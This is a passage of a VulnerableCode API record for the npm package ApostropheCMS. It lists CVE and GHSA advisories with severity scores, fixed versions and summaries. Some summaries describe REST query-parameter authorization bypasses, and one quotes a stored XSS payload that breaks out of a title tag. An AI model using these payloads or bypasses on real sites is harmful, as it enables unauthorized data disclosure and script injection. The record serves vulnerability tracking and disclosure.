                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45012"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-pr28-mf3q-qpg6",
                    "reference_id": "GHSA-pr28-mf3q-qpg6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-pr28-mf3q-qpg6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1164814?format=api",
                    "purl": "pkg:npm/apostrophe@4.30.0-alpha.1",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.30.0-alpha.1"
                }
            ],
            "aliases": [
                "CVE-2026-45012",
                "GHSA-pr28-mf3q-qpg6"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jkpm-13y1-5yfj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/72967?format=api",
            "vulnerability_id": "VCID-pt6d-cm84-e7c4",
            "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the choices and counts query parameters of the REST API, where these query builders execute MongoDB distinct() operations that bypass the publicApiProjection restrictions intended to limit which fields are exposed publicly. The choices and counts parameters are processed via applyBuildersSafely before the projection is applied, and MongoDB's distinct operation does not respect projections, returning all distinct values directly. The results are returned in the API response without any filtering against publicApiProjection or removeForbiddenFields. An unauthenticated attacker can extract all distinct field values for any schema field type that has a registered query builder, including string, integer, float, select, boolean, date, slug, and relationship fields. Fields protected with viewPermission are similarly exposed, and the counts variant additionally reveals how many documents have each distinct value. Both the piece-type and page REST APIs are affected. This issue has been fixed in version 4.29.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39857",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09359",
                            "published_at": "2026-06-11T12:55:00Z"
                        },
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09413",
                            "published_at": "2026-06-12T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39857"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39857",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39857"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa",
                    "reference_id": "6c2b548dec2e3f7a82e8e16736603f4cd17525aa",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:40:14Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c276-fj82-f2pq",
                    "reference_id": "GHSA-c276-fj82-f2pq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c276-fj82-f2pq"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-c276-fj82-f2pq",
                    "reference_id": "GHSA-c276-fj82-f2pq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:40:14Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-c276-fj82-f2pq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api",
                    "purl": "pkg:npm/apostrophe@4.29.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-wscg-efgt-e7bw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0"
                }
            ],
            "aliases": [
                "CVE-2026-39857",
                "GHSA-c276-fj82-f2pq"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pt6d-cm84-e7c4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78012?format=api",
            "vulnerability_id": "VCID-t3jk-9ttu-nfgt",
            "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the getRestQuery method of the @apostrophecms/piece-type module, where the method applies the admin-configured publicApiProjection only if no MongoDB projection has already been set. An unauthenticated attacker can supply a project query parameter in the REST API request, which is processed by applyBuildersSafely before the permission check, pre-populating the projection state and causing the publicApiProjection to be skipped entirely. This allows disclosure of any field on publicly queryable documents that the administrator explicitly restricted from the public API, such as internal notes, draft content, or metadata. Exploitation is trivial: it requires only appending query parameters to a public URL, with no authentication. This issue has been fixed in version 4.29.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33888",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.28995",
                            "published_at": "2026-06-11T12:55:00Z"
                        },
                        {
                            "value": "0.0011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29199",
                            "published_at": "2026-06-12T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33888"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33888",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33888"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/00d472804bb622df36a761b6f2cf2b33b2d4ce80",
                    "reference_id": "00d472804bb622df36a761b6f2cf2b33b2d4ce80",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T20:03:13Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/00d472804bb622df36a761b6f2cf2b33b2d4ce80"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa",
                    "reference_id": "6c2b548dec2e3f7a82e8e16736603f4cd17525aa",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T20:03:13Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xhq9-58fw-859p",
                    "reference_id": "GHSA-xhq9-58fw-859p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xhq9-58fw-859p"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-xhq9-58fw-859p",
                    "reference_id": "GHSA-xhq9-58fw-859p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T20:03:13Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-xhq9-58fw-859p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api",
                    "purl": "pkg:npm/apostrophe@4.29.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-wscg-efgt-e7bw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0"
                }
            ],
            "aliases": [
                "CVE-2026-33888",
                "GHSA-xhq9-58fw-859p"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t3jk-9ttu-nfgt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205887?format=api",
            "vulnerability_id": "VCID-tw2u-1uam-4bef",
            "summary": "Denial of Service in apostrophe",
            "references": [
                {
                    "reference_url": "https://www.npmjs.com/advisories/1183",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.npmjs.com/advisories/1183"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-pv6r-vchh-cxg9",
                    "reference_id": "GHSA-pv6r-vchh-cxg9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-pv6r-vchh-cxg9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/17495?format=api",
                    "purl": "pkg:npm/apostrophe@2.97.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1nxf-g588-c3ey"
                        },
                        {
                            "vulnerability": "VCID-56a7-tu1w-fua8"
                        },
                        {
                            "vulnerability": "VCID-7fb7-sbm9-u7fa"
                        },
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-h84b-fbew-d3a3"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-pt6d-cm84-e7c4"
                        },
                        {
                            "vulnerability": "VCID-qa7n-2hgf-xbbn"
                        },
                        {
                            "vulnerability": "VCID-t3jk-9ttu-nfgt"
                        },
                        {
                            "vulnerability": "VCID-xez4-ydba-nfdb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.97.1"
                }
            ],
            "aliases": [
                "GHSA-pv6r-vchh-cxg9",
                "GMS-2020-705"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tw2u-1uam-4bef"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205725?format=api",
            "vulnerability_id": "VCID-wr3t-pzuf-5fb6",
            "summary": "Open Redirect in apostrophe",
            "references": [
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/1eba144bb82bd43dab72ce36cfbd593361b6d9b7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/1eba144bb82bd43dab72ce36cfbd593361b6d9b7"
                },
                {
                    "reference_url": "https://snyk.io/vuln/SNYK-JS-APOSTROPHE-451089",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://snyk.io/vuln/SNYK-JS-APOSTROPHE-451089"
                },
                {
                    "reference_url": "https://www.npmjs.com/advisories/1029",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.npmjs.com/advisories/1029"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h97g-4mx7-5p2p",
                    "reference_id": "GHSA-h97g-4mx7-5p2p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-h97g-4mx7-5p2p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/17372?format=api",
                    "purl": "pkg:npm/apostrophe@2.92.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1nxf-g588-c3ey"
                        },
                        {
                            "vulnerability": "VCID-56a7-tu1w-fua8"
                        },
                        {
                            "vulnerability": "VCID-7fb7-sbm9-u7fa"
                        },
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-h84b-fbew-d3a3"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-pt6d-cm84-e7c4"
                        },
                        {
                            "vulnerability": "VCID-qa7n-2hgf-xbbn"
                        },
                        {
                            "vulnerability": "VCID-t3jk-9ttu-nfgt"
                        },
                        {
                            "vulnerability": "VCID-tw2u-1uam-4bef"
                        },
                        {
                            "vulnerability": "VCID-xez4-ydba-nfdb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.92.0"
                }
            ],
            "aliases": [
                "GHSA-h97g-4mx7-5p2p",
                "GMS-2020-704"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wr3t-pzuf-5fb6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71682?format=api",
            "vulnerability_id": "VCID-xez4-ydba-nfdb",
            "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in SEO-related fields (SEO Title and Meta Description), where user-controlled input is rendered without proper output encoding into HTML contexts including <title> tags, <meta> attributes, and JSON-LD structured data. An attacker can inject a payload such as \"></title><script>alert(1)</script> to break out of the intended HTML context and execute arbitrary JavaScript in the browser of any authenticated user who views the affected page. This can be leveraged to perform authenticated API requests, access sensitive data such as usernames, email addresses, and roles via internal APIs, and exfiltrate it to an attacker-controlled server. This issue has been fixed in version 4.29.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11528",
                            "published_at": "2026-06-12T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1145",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35569"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35569"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3",
                    "reference_id": "0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-16T14:14:28Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3"
                },
                {
                    "reference_url": "https://github.com/Chittu13/cve-research/tree/main/CVE-2026-35569",
                    "reference_id": "CVE-2026-35569",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-16T14:14:28Z/"
                        }
                    ],
                    "url": "https://github.com/Chittu13/cve-research/tree/main/CVE-2026-35569"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-855c-r2vq-c292",
                    "reference_id": "GHSA-855c-r2vq-c292",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-855c-r2vq-c292"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-855c-r2vq-c292",
                    "reference_id": "GHSA-855c-r2vq-c292",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-16T14:14:28Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-855c-r2vq-c292"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api",
                    "purl": "pkg:npm/apostrophe@4.29.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-wscg-efgt-e7bw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0"
                }
            ],
            "aliases": [
                "CVE-2026-35569",
                "GHSA-855c-r2vq-c292"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xez4-ydba-nfdb"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.0",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.348"
}